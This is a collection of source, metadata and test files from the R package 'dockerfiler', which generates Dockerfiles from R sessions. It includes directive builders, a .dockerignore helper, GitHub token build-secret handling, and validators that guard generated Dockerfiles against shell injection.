Package: dockerfiler
Title: Easy Dockerfile Creation from R
Version: 1.0.0
Authors@R: c(
    person("Colin", "Fay", , "contact@colinfay.me", role = c("cre", "aut"),
           comment = c(ORCID = "0000-0001-7343-1846")),
    person("Vincent", "Guyader", , "vincent@thinkr.fr", role = "aut",
           comment = c(ORCID = "0000-0003-0671-9270")),
    person("Josiah", "Parry", , "josiah.parry@gmail.com", role = "aut",
           comment = c(ORCID = "0000-0001-9910-865X")),
    person("Sébastien", "Rochette", , "sebastien@thinkr.fr", role = "aut",
           comment = c(ORCID = "0000-0002-1565-9313"))
  )
Description: Build a Dockerfile straight from your R session.
    'dockerfiler' allows you to create step by step a Dockerfile, and
    provide convenient tools to wrap R code inside this Dockerfile.
License: MIT + file LICENSE
URL: https://thinkr-open.github.io/dockerfiler/,
        https://github.com/ThinkR-open/dockerfiler
BugReports: https://github.com/ThinkR-open/dockerfiler/issues
Imports: attempt (>= 0.3.1), cli (>= 2.3.0), desc (>= 1.2.0), fs (>=
        1.5.0), glue (>= 1.4.2), jsonlite (>= 1.7.2), memoise, pak (>=
        0.6.0), pkgbuild (>= 1.2.0), purrr, R6 (>= 2.5.0), remotes (>=
        2.2.0), usethis (>= 2.0.1), utils
Suggests: knitr (>= 1.31), renv, rmarkdown (>= 2.6), testthat (>=
        3.0.0), withr
VignetteBuilder: knitr
Config/fusen/version: 0.6.0
Config/testthat/edition: 3
Encoding: UTF-8
RoxygenNote: 7.3.3
NeedsCompilation: no
Packaged: 2026-05-13 09:16:49 UTC; PC
Author: Colin Fay [cre, aut] (ORCID: <https://orcid.org/0000-0001-7343-1846>),
  Vincent Guyader [aut] (ORCID: <https://orcid.org/0000-0003-0671-9270>),
  Josiah Parry [aut] (ORCID: <https://orcid.org/0000-0001-9910-865X>),
  Sébastien Rochette [aut] (ORCID:
    <https://orcid.org/0000-0002-1565-9313>)
Maintainer: Colin Fay <contact@colinfay.me>
Repository: CRAN
Date/Publication: 2026-05-14 06:30:02 UTC
Built: R 4.5.2; ; 2026-05-14 09:48:16 UTC; unix

Package: dockerfiler
Title: Easy Dockerfile Creation from R
Version: 1.0.0
Authors@R: c(
    person("Colin", "Fay", , "contact@colinfay.me", role = c("cre", "aut"),
           comment = c(ORCID = "0000-0001-7343-1846")),
    person("Vincent", "Guyader", , "vincent@thinkr.fr", role = "aut",
           comment = c(ORCID = "0000-0003-0671-9270")),
    person("Josiah", "Parry", , "josiah.parry@gmail.com", role = "aut",
           comment = c(ORCID = "0000-0001-9910-865X")),
    person("Sébastien", "Rochette", , "sebastien@thinkr.fr", role = "aut",
           comment = c(ORCID = "0000-0002-1565-9313"))
  )
Description: Build a Dockerfile straight from your R session.
    'dockerfiler' allows you to create step by step a Dockerfile, and
    provide convenient tools to wrap R code inside this Dockerfile.
License: MIT + file LICENSE
URL: https://thinkr-open.github.io/dockerfiler/,
        https://github.com/ThinkR-open/dockerfiler
BugReports: https://github.com/ThinkR-open/dockerfiler/issues
Imports: attempt (>= 0.3.1), cli (>= 2.3.0), desc (>= 1.2.0), fs (>=
        1.5.0), glue (>= 1.4.2), jsonlite (>= 1.7.2), memoise, pak (>=
        0.6.0), pkgbuild (>= 1.2.0), purrr, R6 (>= 2.5.0), remotes (>=
        2.2.0), usethis (>= 2.0.1), utils
Suggests: knitr (>= 1.31), renv, rmarkdown (>= 2.6), testthat (>=
        3.0.0), withr
VignetteBuilder: knitr
Config/fusen/version: 0.6.0
Config/testthat/edition: 3
Encoding: UTF-8
RoxygenNote: 7.3.3
NeedsCompilation: no
Packaged: 2026-05-13 09:16:49 UTC; PC
Author: Colin Fay [cre, aut] (ORCID: <https://orcid.org/0000-0001-7343-1846>),
  Vincent Guyader [aut] (ORCID: <https://orcid.org/0000-0003-0671-9270>),
  Josiah Parry [aut] (ORCID: <https://orcid.org/0000-0001-9910-865X>),
  Sébastien Rochette [aut] (ORCID:
    <https://orcid.org/0000-0002-1565-9313>)
Maintainer: Colin Fay <contact@colinfay.me>
Repository: CRAN
Date/Publication: 2026-05-14 06:30:02 UTC
Built: R 4.6.0; ; 2026-05-14 07:18:12 UTC; unix

Package: myshinyapp
Title: Example of myshinyapp
Version: 0.1.0
Authors@R: 
    c(person(given = "Sébastien",
             family = "Rochette",
             role = c("aut", "cre"),
             email = "sebastien@thinkr.fr",
             comment = c(ORCID = "0000-0002-1565-9313")),
      person(given = "ThinkR",
             role = "cph"))
Description: This is an example of description file of a shiny app for tests.
License: file LICENSE
Depends: 
    R (>= 2.10)
Imports: 
    cli,
    glue,
    golem,
    shiny,
    stats,
    utils
Suggests: 
    testthat
VignetteBuilder: 
    knitr
Config/testthat/edition: 3
Encoding: UTF-8
LazyData: true
RoxygenNote: 7.1.1

Package: dockerfiler
Title: Easy Dockerfile Creation from R
Version: 0.1.3.9000
Authors@R:
    c(person(given = "Colin",
             family = "Fay",
             role = c("cre", "aut"),
             email = "contact@colinfay.me",
             comment = c(ORCID = "0000-0001-7343-1846")),
      person(given = "Vincent",
             family = "Guyader",
             role = "aut",
             email = "vincent@thinkr.fr",
             comment = c(ORCID = "0000-0003-0671-9270")))
Description: Build a Dockerfile straight from your R session.
    'dockerfiler' allows you to create step by step a Dockerfile, and
    provide convenient tools to wrap R code inside this Dockerfile.
License: MIT + file LICENSE
URL: https://github.com/ColinFay/dockerfiler
BugReports: https://github.com/ColinFay/dockerfiler/issues
Imports:
    attempt (>= 0.3.1),
    glue,
    R6,
    utils,
    fs,
    cli (>= 2.3.0),
    remotes,
    desc,
    usethis,
    jsonlite,
    pkgbuild
Suggests:
    covr,
VignetteBuilder:
    knitr
Encoding: UTF-8
LazyData: true
RoxygenNote: 6.1.0
Config/testthat/edition: 3

# Generated by roxygen2: do not edit by hand

export(Dockerfile)
export(compact_sysreqs)
export(dock_from_desc)
export(dock_from_renv)
export(docker_ignore_add)
export(get_sysreqs)
export(parse_dockerfile)
export(r)
importFrom(R6,R6Class)
importFrom(attempt,map_try_catch)
importFrom(attempt,warn_if_not)
importFrom(cli,cat_bullet)
importFrom(desc,desc_get)
importFrom(desc,desc_get_deps)
importFrom(fs,file_create)
importFrom(fs,file_exists)
importFrom(fs,path)
importFrom(glue,glue)
importFrom(jsonlite,fromJSON)
importFrom(memoise,memoise)
importFrom(pak,pkg_sysreqs)
importFrom(pkgbuild,build)
importFrom(purrr,keep_at)
importFrom(purrr,pluck)
importFrom(remotes,dev_package_deps)
importFrom(remotes,package_deps)
importFrom(usethis,use_build_ignore)
importFrom(utils,download.file)
importFrom(utils,getFromNamespace)
importFrom(utils,glob2rx)
importFrom(utils,installed.packages)
importFrom(utils,packageVersion)

#' Generate base image name
#'
#' Creates the base image name from the provided distro name and the R version found in the `renv.lock` file.
#'
#' @keywords internal
#' @noRd
gen_base_image <- function(
  distro = NULL,
  r_version = "4.0",
  FROM = "rstudio/r-base"
) {

if (!is.null(distro)){
  warning("the `distro` parameter is not used anymore, only debian/ubuntu based images are supported")
}

# If the caller already pinned a tag (`:something`) or digest
# (`@sha256:...`), do not append `:r_version` on top of it -- that
# would yield an invalid image reference like `repo:tag:r_version`.
if (grepl("(:[^/]+|@sha256:[a-fA-F0-9]+)$", FROM)) {
  glue::glue("{FROM}")
} else {
  glue::glue("{FROM}:{r_version}")
}

}

#' @importFrom glue glue
#' @importFrom attempt warn_if_not
#' @noRd
create_dockerfile <- function(
  FROM = "rocker/r-base",
  AS = NULL
) {
  if (is.null(AS)) {
    glue("FROM {FROM}")
  } else {
    glue("FROM {FROM} AS {AS}")
  }
}

add_run <- function(cmd) {
  glue("RUN {cmd}")
}

add_add <- function(
  from,
  to,
  force = TRUE
) {
  if (!force) {
    warn_if_not(
      normalizePath(from),
      file.exists,
      "The file `from` doesn't seem to exists"
    )
  }
  glue("ADD {from} {to}")
}

add_copy <- function(from,
                     to,
                     stage = NULL,
                     force = TRUE) {
  if (!force) {
    warn_if_not(normalizePath(from),
                file.exists,
                "The file `from` doesn't seem to exists")
  }

  if (is.null(stage)) {
    glue("COPY {from} {to}")
  } else {
    glue("COPY --from={stage} {from} {to}")

  }
}

add_workdir <- function(where) {
  glue("WORKDIR {where}")
}

add_expose <- function(port) {
  warn_if_not(
    port,
    is.numeric,
    "You've entered a character vector"
  )
  glue("EXPOSE {port}")
}

add_volume <- function(volume) {
  glue("VOLUME {volume}")
}

add_cmd <- function(cmd) {
  glue("CMD {cmd}")
}

add_label <- function(key, value) {
  glue('LABEL "{key}"="{value}"')
}

add_env <- function(key, value) {
  glue('ENV "{key}"="{value}"')
}

add_entrypoint <- function(cmd) {
  glue("ENTRYPOINT {cmd}")
}

add_user <- function(user) {
  glue("USER {user}")
}

add_arg <- function(arg, default = NULL) {
  if (is.null(default)) {
    glue("ARG {arg}")
  } else {
    if (grepl("=", arg, fixed = TRUE)) {
      stop(
        "`arg` already contains an `=` sign. Pass either the inlined ",
        "form (`\"NAME=value\"`) or the explicit default ",
        "(`default = \"value\"`), but not both."
      )
    }
    glue("ARG {arg}={default}")
  }
}

add_onbuild <- function(cmd) {
  glue("ONBUILD {cmd}")
}

add_stopsignal <- function(signal) {
  glue("STOPSIGNAL {signal}")
}

add_healthcheck <- function(check) {
  glue("HEALTHCHECK {check}")
}

add_shell <- function(shell) {
  glue("SHELL {shell}")
}

add_maintainer <- function(name, email) {
  glue("MAINTAINER {name} <{email}>")
}

add_custom <- function(base, cmd) {
  glue("{base} {cmd}")
}


add_comment <- function(comment) {
  paste0("# ", strsplit(comment, "\n")[[1]], collapse = "\n")
}

switch_them <- function(vec, a, b) {
  what <- vec[a]
  whbt <- vec[b]
  vec[b] <- what
  vec[a] <- whbt
  vec
}
remove_from <- function(vec, what) {
  vec[-what]
}

add_to <- function(vec, cmd, after) {
  append(vec, cmd, after)
}

test_that("add_add(force = FALSE) warns when source path does not exist", {
  expect_warning(
    out <- dockerfiler:::add_add(
      from = file.path(tempdir(), "definitely-not-a-real-file.xyz"),
      to = "/dest",
      force = FALSE
    ),
    "doesn't seem to exist"
  )
  expect_match(as.character(out), "^ADD ")
})

test_that("add_add(force = TRUE) does not warn even when source is missing", {
  expect_no_warning(
    out <- dockerfiler:::add_add(
      from = "definitely-not-a-real-file.xyz",
      to = "/dest",
      force = TRUE
    )
  )
  expect_match(as.character(out), "^ADD ")
})

test_that("add_copy(force = FALSE) warns when source path does not exist", {
  expect_warning(
    out <- dockerfiler:::add_copy(
      from = file.path(tempdir(), "definitely-not-a-real-file.xyz"),
      to = "/dest",
      force = FALSE
    ),
    "doesn't seem to exist"
  )
  expect_match(as.character(out), "^COPY ")
})

test_that("add_copy with stage = '<name>' emits the COPY --from=<name> form", {
  out <- dockerfiler:::add_copy(
    from = "/src",
    to = "/dest",
    stage = "builder",
    force = TRUE
  )
  expect_equal(as.character(out), "COPY --from=builder /src /dest")
})

#' Create a dockerignore file
#'
#' @param path Where to write the file
#'
#' @return The path to the `.dockerignore` file, invisibly.
#' @export
#' @importFrom fs path file_exists file_create
#' @importFrom cli cat_bullet
#'
#' @examples
#' \dontrun{
#'   docker_ignore_add()
#' }
docker_ignore_add <- function(path) {
  path_di <- fs::path(
    path,
    ".dockerignore"
  )

  if (!fs::file_exists(
    path_di
  )) {
    fs::file_create(path_di)

    write_ignore <- function(content) {
      write(content, path_di, append = TRUE)
    }

    for (i in c(
      ".RData",
      ".Rhistory",
      ".git",
      ".gitignore",
      "manifest.json",
      "rsconnect/",
      ".Rproj.user"
    )) {
      write_ignore(i)
    }

    path_ri <- fs::path(
      path,
      ".Rbuildignore"
    )
    if (fs::file_exists(
      path_ri
    )) {
      write(
        "^\\.dockerignore$",
        path_ri,
        append = TRUE)
      cat_bullet(
        ".dockerignore added to the .Rbuildignore file.",
        bullet = "info",
        bullet_col = "green"
      )
    }
  } else {
    cat_bullet(
      ".dockerignore already present, skipping its creation.",
      bullet = "bullet",
      bullet_col = "red"
    )
  }

  return(invisible(path_di))
}

test_that("docker_ignore_add creates a .dockerignore with the expected entries", {
  tmp <- tempfile(pattern = "ign")
  dir.create(tmp)
  on.exit(unlink(tmp, recursive = TRUE), add = TRUE)

  out <- docker_ignore_add(path = tmp)
  di <- file.path(tmp, ".dockerignore")
  expect_true(file.exists(di))
  expect_identical(unname(out), unname(fs::path(tmp, ".dockerignore")))
  contents <- readLines(di)
  for (entry in c(".RData", ".Rhistory", ".git", ".gitignore",
                  "manifest.json", "rsconnect/", ".Rproj.user")) {
    expect_true(entry %in% contents, info = entry)
  }
})

test_that("docker_ignore_add appends to an existing .Rbuildignore", {
  tmp <- tempfile(pattern = "ign")
  dir.create(tmp)
  on.exit(unlink(tmp, recursive = TRUE), add = TRUE)

  rbi <- file.path(tmp, ".Rbuildignore")
  writeLines("^pre-existing$", con = rbi)

  docker_ignore_add(path = tmp)

  rbi_lines <- readLines(rbi)
  expect_true("^pre-existing$" %in% rbi_lines)
  expect_true("^\\.dockerignore$" %in% rbi_lines)
})

test_that("docker_ignore_add is a no-op when .dockerignore already exists", {
  tmp <- tempfile(pattern = "ign")
  dir.create(tmp)
  on.exit(unlink(tmp, recursive = TRUE), add = TRUE)

  di <- file.path(tmp, ".dockerignore")
  writeLines("preexisting-line", con = di)
  rbi <- file.path(tmp, ".Rbuildignore")
  writeLines("^preexisting$", con = rbi)

  docker_ignore_add(path = tmp)

  expect_identical(readLines(di), "preexisting-line")
  expect_identical(readLines(rbi), "^preexisting$")
})

#' Turn an R expression into a shell `R -e '...'` call
#'
#' Captures an R expression unevaluated and renders it as a single
#' shell-quoted `R -e '...'` string, suitable for a [Dockerfile]
#' `$RUN()` directive.
#'
#' @param code an R expression (captured unevaluated) to wrap.
#'
#' @return a length-1 character string of the form `R -e '...'`,
#'   shell-quoted with [base::shQuote()].
#' @export
#'
#' @examples
#' r(print("yeay"))
#' r(install.packages("plumber", repos = "https://cloud.r-project.org"))
r <- function(code) {
  code <- paste(trimws(deparse(substitute(code))), collapse = " ")
  glue("R -e {shQuote(code, type = 'sh')}")
}

set_name <- function(x, y) {
  names(x) <- y
  x
}

#' @importFrom cli cat_bullet
#' @noRd
cat_green_tick <- function(...) {
  cat_bullet(
    ...,
    bullet = "tick",
    bullet_col = "green"
  )
}

#' @importFrom cli cat_bullet
#' @noRd
cat_red_bullet <- function(...) {
  cat_bullet(
    ...,
    bullet = "bullet",
    bullet_col = "red"
  )
}

#' @importFrom cli cat_bullet
#' @noRd
cat_info <- function(...) {
  cat_bullet(
    ...,
    bullet = "arrow_right",
    bullet_col = "grey"
  )
}

#' Add GITHUB_PAT plumbing to a Dockerfile.
#'
#' For mode `"build_arg"`, emits an `ARG GITHUB_PAT` directive (no
#' default) and an `ENV GITHUB_PAT=${GITHUB_PAT}` propagation so any
#' subsequent RUN inherits the value. For `"none"` and `"secret"`, no
#' top-level directive is emitted (in `"secret"` mode the secret is
#' mounted RUN-by-RUN by `.github_pat_run_prefix()`).
#' Side-effects only: modifies `dock` in place.
#' @noRd
.github_pat_setup <- function(dock, mode) {
  if (identical(mode, "build_arg")) {
    dock$ARG("GITHUB_PAT")
    dock$ENV(key = "GITHUB_PAT", value = "${GITHUB_PAT}")
  }
  invisible(NULL)
}

#' BuildKit secret-mount prefix for a RUN that needs `GITHUB_PAT`.
#'
#' Returns a string to prepend to a RUN command body. Empty string for
#' modes `"none"` and `"build_arg"` (the latter relies on the ENV set
#' by `.github_pat_setup()`); a `--mount=type=secret,...` fragment plus
#' a shell `GITHUB_PAT=$(cat ...)` prefix for mode `"secret"`.
#'
#' The file-read pattern (`cat /run/secrets/github_pat`) is preferred
#' over the `--mount=type=secret,...,env=GITHUB_PAT` shortcut because
#' the latter requires Dockerfile frontend `1.6+` (introduced in 2023)
#' and otherwise needs an explicit `# syntax=docker/dockerfile:1.6`
#' header. The file-read pattern works on every BuildKit version that
#' supports `--mount=type=secret` at all.
#' @noRd
.github_pat_run_prefix <- function(mode) {
  if (identical(mode, "secret")) {
    "--mount=type=secret,id=github_pat GITHUB_PAT=$(cat /run/secrets/github_pat) "
  } else {
    ""
  }
}

#' Strict-install prefix for an R / Rscript invocation in a Dockerfile RUN.
#'
#' When `strict_install = TRUE`, returns `"options(warn = 2); "` so
#' that warnings emitted during the install (e.g. a missing CRAN
#' package, a 404 on a remote, a partial install) become hard
#' errors and the docker build aborts. Otherwise an empty string,
#' which preserves the legacy behavior where install warnings did
#' not fail the build.
#' @noRd
.r_strict_prefix <- function(strict_install) {
  # Caller must pass a single TRUE / FALSE; `dock_from_desc()` validates.
  if (strict_install) {
    "options(warn = 2); "
  } else {
    ""
  }
}

#' Validate user-supplied strings that flow into a Dockerfile shell context.
#'
#' These helpers reject inputs that, if interpolated raw, would either
#' break the generated Dockerfile / shell command or allow injection of
#' arbitrary commands at `docker build` time. Each helper raises an
#' error with a clear message naming the offending parameter. `NULL` is
#' accepted where it has a documented meaning (e.g. `renv_paths_cache`,
#' `renv_version`, `extra_sysreqs`, `repos`).
#' @noRd
.validate_FROM <- function(x) {
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`FROM` must be a single string, got: ",
      deparse(x)
    )
  }
  # Docker reference grammar permits `<host>[:<port>]/<image>[:<tag>][@sha256:<hex>]`.
  # The host segment may itself contain `:` (port). To keep the regex simple
  # and unambiguous, accept any number of `<segment>` separated by `/` where
  # each segment is alphanumerics + `._-`, optionally followed by `:digits`
  # for the port; then the final segment may carry the `:tag` or `@sha256:`
  # suffix. Shell metacharacters (`$`, `` ` ``, `\\`, quotes, newlines,
  # spaces) remain forbidden by the alphabet alone.
  if (
    !grepl(
      paste0(
        "^",
        "[a-zA-Z0-9][a-zA-Z0-9._-]*(:[0-9]+)?",
        "(/[a-zA-Z0-9][a-zA-Z0-9._-]*)*",
        "(:[a-zA-Z0-9._-]+)?",
        "(@sha256:[a-fA-F0-9]+)?",
        "$"
      ),
      x
    )
  ) {
    stop(
      "`FROM` must be a valid Docker image reference ",
      "(`<host>[:<port>]/<image>[:<tag>][@sha256:<hex>]`; alphanumerics ",
      "plus `._-` per segment; no newlines or shell metacharacters), got: ",
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_r_version <- function(x) {
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`r_version` (read from the lockfile) must be a single string, got: ",
      deparse(x)
    )
  }
  # Accept the four shapes renv records in real lockfiles: stable
  # `X.Y` / `X.Y.Z`, release-candidate `X.Y.Z-RC`, R-devel string
  # `r-devel`, and the historical `X.Y.Z Patched` form. The value is
  # interpolated only into the FROM directive, which `.validate_FROM`
  # gates separately for shell metacharacters; a slightly more
  # permissive `r_version` shape is safe.
  ok <- (
    grepl("^[0-9]+\\.[0-9]+(\\.[0-9]+)?(-[A-Za-z0-9._]+)?$", x) ||
      identical(x, "r-devel") ||
      grepl("^[0-9]+\\.[0-9]+(\\.[0-9]+)? Patched$", x)
  )
  if (!ok) {
    stop(
      "`r_version` (read from the lockfile) must look like an R version ",
      "such as \"4.5\", \"4.5.0\", \"4.5.0-RC\", or \"r-devel\", got: ",
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_repos <- function(x) {
  if (is.null(x)) {
    return(invisible())
  }
  if (!is.character(x)) {
    stop(
      "`repos` must be a character vector, got: ",
      deparse(x)
    )
  }
  # The validated value lands inside double-quoted shell context
  # (`echo "options(repos = ...)"`). Inside `"..."`, the shell still
  # interprets `$`, `\``, `\\` and `!` (bash history). Reject these
  # explicitly so the validator doubles as an escape primitive for the
  # known wrapper. Parens are also rejected because some shells expand
  # them in alias contexts; the URL grammar tolerates `%28`/`%29`.
  bad <- is.na(x) | !grepl(
    "^https?://[A-Za-z0-9._~:/?#@&*+,;=%-]+$",
    x
  )
  if (any(bad)) {
    stop(
      "`repos` entries must be http(s) URLs containing only ",
      "URL-safe characters (no quotes, parentheses, dollar, ",
      "backtick, backslash, spaces or newlines); invalid: ",
      paste(vapply(x[bad], deparse, character(1)), collapse = ", ")
    )
  }
  # Names are emitted via `dput(repos)`, which wraps R-syntax-unsafe
  # names in backticks. Backticks inside a Dockerfile RUN's outer
  # double-quoted shell context trigger command substitution. Tight
  # regex on names to keep them simple identifiers.
  nms <- names(x)
  if (!is.null(nms)) {
    bad_nms <- is.na(nms) | !grepl("^[A-Za-z][A-Za-z0-9._-]*$", nms)
    if (any(bad_nms)) {
      stop(
        "`names(repos)` must be simple identifiers ",
        "(`^[A-Za-z][A-Za-z0-9._-]*$`); invalid: ",
        paste(vapply(nms[bad_nms], deparse, character(1)), collapse = ", ")
      )
    }
  }
  invisible()
}

#' @noRd
.validate_AS <- function(x) {
  if (is.null(x)) {
    return(invisible())
  }
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`AS` must be a single string or NULL, got: ",
      deparse(x)
    )
  }
  if (!grepl("^[a-zA-Z0-9][a-zA-Z0-9._-]*$", x)) {
    stop(
      "`AS` must be a simple build-stage name ",
      "(`^[a-zA-Z0-9][a-zA-Z0-9._-]*$`), got: ",
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_scalar_logical <- function(x, name) {
  if (
    !is.logical(x) ||
      length(x) != 1L ||
      is.na(x)
  ) {
    stop(
      sprintf("`%s` must be a single `TRUE` or `FALSE`, got: ", name),
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_extra_sysreqs <- function(x) {
  if (is.null(x)) {
    return(invisible())
  }
  if (!is.character(x)) {
    stop(
      "`extra_sysreqs` must be a character vector, got: ",
      deparse(x)
    )
  }
  bad <- is.na(x) | !grepl("^[a-z0-9][a-z0-9.+-]+$", x)
  if (any(bad)) {
    stop(
      "`extra_sysreqs` entries must be Debian package names ",
      "matching `^[a-z0-9][a-z0-9.+-]+$`; invalid: ",
      paste(vapply(x[bad], deparse, character(1)), collapse = ", ")
    )
  }
  invisible()
}

#' @noRd
.validate_renv_version <- function(x) {
  if (is.null(x)) {
    return(invisible())
  }
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`renv_version` must be a single string or NULL, got: ",
      deparse(x)
    )
  }
  if (!grepl("^[0-9]+(\\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$", x)) {
    stop(
      "`renv_version` must look like a version string such as ",
      "\"1.0.0\" or \"0.16.0-beta\", got: ",
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_lockfile <- function(x) {
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`lockfile` must be a single path string, got: ",
      deparse(x)
    )
  }
  bn <- basename(x)
  if (!grepl("^[A-Za-z0-9._-]+$", bn)) {
    stop(
      "`lockfile` basename must contain only alphanumerics, dots, ",
      "underscores or hyphens (no spaces or shell metacharacters); ",
      "the COPY directive in the generated Dockerfile would otherwise ",
      "be malformed. Got basename: ",
      deparse(bn)
    )
  }
  invisible()
}

#' @noRd
.validate_pkg_name <- function(x) {
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "the package name read from the DESCRIPTION must be a single ",
      "string, got: ",
      deparse(x)
    )
  }
  # CRAN package-name grammar: a letter, then letters / digits / dots.
  # `read.dcf()` joins DCF continuation lines with `\n`, so a crafted
  # `Package:` field could otherwise smuggle a newline (and an extra
  # Dockerfile directive) into the `COPY <pkg>_*.tar.gz` line generated
  # for `build_from_source = FALSE`. This grammar excludes whitespace,
  # newlines and every shell / Dockerfile metacharacter.
  if (!grepl("^[a-zA-Z][a-zA-Z0-9.]*$", x)) {
    stop(
      "the package name read from the DESCRIPTION must match the CRAN ",
      "package-name grammar /^[a-zA-Z][a-zA-Z0-9.]*$/ ",
      "(letters, digits and dots only, starting with a letter), got: ",
      deparse(x)
    )
  }
  invisible()
}

#' @noRd
.validate_pkg_names <- function(x) {
  if (length(x) == 0L) {
    return(invisible())
  }
  if (!is.character(x)) {
    stop(
      "the package names read from the DESCRIPTION dependency fields ",
      "must be a character vector, got: ",
      deparse(x)
    )
  }
  # Same CRAN package-name grammar as `.validate_pkg_name()`, applied to
  # every Imports / Depends / Suggests / LinkingTo / Enhances entry.
  # `desc::desc_get_deps()` joins DCF continuation lines with `\n`, so a
  # crafted dependency field could otherwise smuggle a newline (and an
  # extra Dockerfile directive) into the generated
  # `remotes::install_version("<name>", ...)` install RUN.
  bad <- is.na(x) | !grepl("^[a-zA-Z][a-zA-Z0-9.]*$", x)
  if (any(bad)) {
    stop(
      "package names read from the DESCRIPTION dependency fields must ",
      "match the CRAN package-name grammar /^[a-zA-Z][a-zA-Z0-9.]*$/ ",
      "(letters, digits and dots only, starting with a letter); ",
      "invalid: ",
      paste(vapply(x[bad], deparse, character(1)), collapse = ", ")
    )
  }
  invisible()
}

#' @noRd
.validate_renv_paths_cache <- function(x) {
  if (is.null(x)) {
    return(invisible())
  }
  if (!is.character(x) || length(x) != 1L || is.na(x)) {
    stop(
      "`renv_paths_cache` must be a single path string or NULL, got: ",
      deparse(x)
    )
  }
  if (!grepl("^/[A-Za-z0-9._/-]*$", x)) {
    stop(
      "`renv_paths_cache` must be an absolute path containing only ",
      "alphanumerics, dots, slashes, underscores or hyphens ",
      "(`^/[A-Za-z0-9._/-]*$`); shell metacharacters or newlines ",
      "would break the ARG directive. Got: ",
      deparse(x)
    )
  }
  invisible()
}

#' Emit a one-shot reminder describing how the PAT must be supplied at
#' `docker build` time. No-op when mode is `"none"`.
#' @noRd
.github_pat_announce <- function(mode) {
  if (identical(mode, "build_arg")) {
    cat_info(
      "Pass the PAT at build time: ",
      "`docker build --build-arg GITHUB_PAT=$GITHUB_PAT ...` ",
      "(NB: the PAT will be visible in the resulting image metadata; ",
      "use `github_pat = \"secret\"` for published images)."
    )
  } else if (identical(mode, "secret")) {
    cat_info(
      "Pass the PAT at build time: ",
      "`DOCKER_BUILDKIT=1 docker build --secret id=github_pat,env=GITHUB_PAT ...`"
    )
  }
  invisible(NULL)
}

test_that("utils works", {
  res <- testthat::capture_output({
    cat_green_tick("test")
  })
  expect_true(
    grepl(
      "test",
      res
    )
  )
  res <- testthat::capture_output({
    cat_red_bullet("test")
  })
  expect_true(
    grepl(
      "test",
      res
    )
  )
  res <- testthat::capture_output({
    cat_info("test")
  })
  expect_true(
    grepl(
      "test",
      res
    )
  )
})

test_that(".validate_* helpers reject malformed inputs (type / length / NA guards)", {
  # Each `.validate_*` interpolates its argument into a generated
  # Dockerfile directive, so the type/length/NA guards are part of the
  # security contract -- they must fire, not just the format-regex
  # branch (which is exercised elsewhere via the dock_from_* tests).

  expect_error(dockerfiler:::.validate_FROM(123L), "FROM")
  expect_error(dockerfiler:::.validate_FROM(c("a", "b")), "FROM")
  expect_error(dockerfiler:::.validate_r_version(123L), "single string")
  expect_error(dockerfiler:::.validate_r_version(c("4.5", "4.6")), "single string")
  expect_error(dockerfiler:::.validate_AS(123L), "AS")
  expect_error(dockerfiler:::.validate_AS(c("a", "b")), "AS")
  expect_error(dockerfiler:::.validate_renv_version(123L), "renv_version")
  expect_error(dockerfiler:::.validate_renv_version(c("1.0", "2.0")), "renv_version")
  expect_error(dockerfiler:::.validate_lockfile(123L), "lockfile")
  expect_error(dockerfiler:::.validate_lockfile(c("a", "b")), "lockfile")
  expect_error(dockerfiler:::.validate_pkg_name(123L), "package name")
  expect_error(dockerfiler:::.validate_pkg_name(c("a", "b")), "package name")
  expect_error(dockerfiler:::.validate_pkg_name(NA_character_), "package name")
  expect_error(dockerfiler:::.validate_renv_paths_cache(123L), "renv_paths_cache")
  expect_error(dockerfiler:::.validate_renv_paths_cache(c("/a", "/b")), "renv_paths_cache")

  # `NULL` is accepted by the validators that document a `NULL` default.
  expect_silent(dockerfiler:::.validate_AS(NULL))
  expect_silent(dockerfiler:::.validate_renv_version(NULL))
  expect_silent(dockerfiler:::.validate_renv_paths_cache(NULL))

  # Vector validators: a non-character input must raise; an empty vector
  # is the legitimate "no dependencies" case and must be silent.
  expect_error(dockerfiler:::.validate_repos(123L), "character vector")
  expect_error(dockerfiler:::.validate_extra_sysreqs(123L), "character vector")
  expect_error(dockerfiler:::.validate_pkg_names(123L), "character vector")
  expect_silent(dockerfiler:::.validate_extra_sysreqs(NULL))
  expect_silent(dockerfiler:::.validate_pkg_names(character(0)))

  # Scalar-logical validator: anything that is not a single TRUE/FALSE.
  expect_error(dockerfiler:::.validate_scalar_logical(1L, "x"), "x")
  expect_error(dockerfiler:::.validate_scalar_logical(c(TRUE, FALSE), "x"), "x")
  expect_error(dockerfiler:::.validate_scalar_logical(NA, "x"), "x")
  expect_error(dockerfiler:::.validate_scalar_logical("TRUE", "x"), "x")

  # Format-regex branch of the validators that the dock_from_* tests do
  # not already cover directly.
  expect_error(dockerfiler:::.validate_renv_paths_cache("relative/path"), "renv_paths_cache")
  expect_error(dockerfiler:::.validate_pkg_names(c("ok", "1bad")), "package name")
  expect_silent(dockerfiler:::.validate_pkg_names(c("cli", "glue", "R.utils")))
})

# A temporary directory
dir_build <- tempfile(pattern = "renv")
dir.create(dir_build)

# Create a lockfile
the_lockfile <- file.path(dir_build, "renv.lock")

custom_packages <- c(
  # attachment::att_from_description(),
  "cli",
  "glue", # "golem",
  "shiny",
  "stats",
  "utils",
  "testthat",
  "knitr"
)
if (!testthat:::on_cran() && requireNamespace("renv", quietly = TRUE)) {
  renv::snapshot(
    packages = custom_packages,
    lockfile = the_lockfile,
    prompt = FALSE
  )
} else {
  file.copy(from = system.file("renv.lock", package = "dockerfiler"), to = the_lockfile)
}

# Modify R version for tests
renv_file <- readLines(file.path(dir_build, "renv.lock"))
renv_file[grep("Version", renv_file)[1]] <- '    "Version": "4.1.2",'
writeLines(renv_file, file.path(dir_build, "renv.lock"))



# dock_from_renv ----
test_that("dock_from_renv works", {

  # testthat::skip_on_cran()
  # skip_if_not(interactive())
  # Create Dockerfile
  skip_if(is_rdevel, "skip on R-devel")

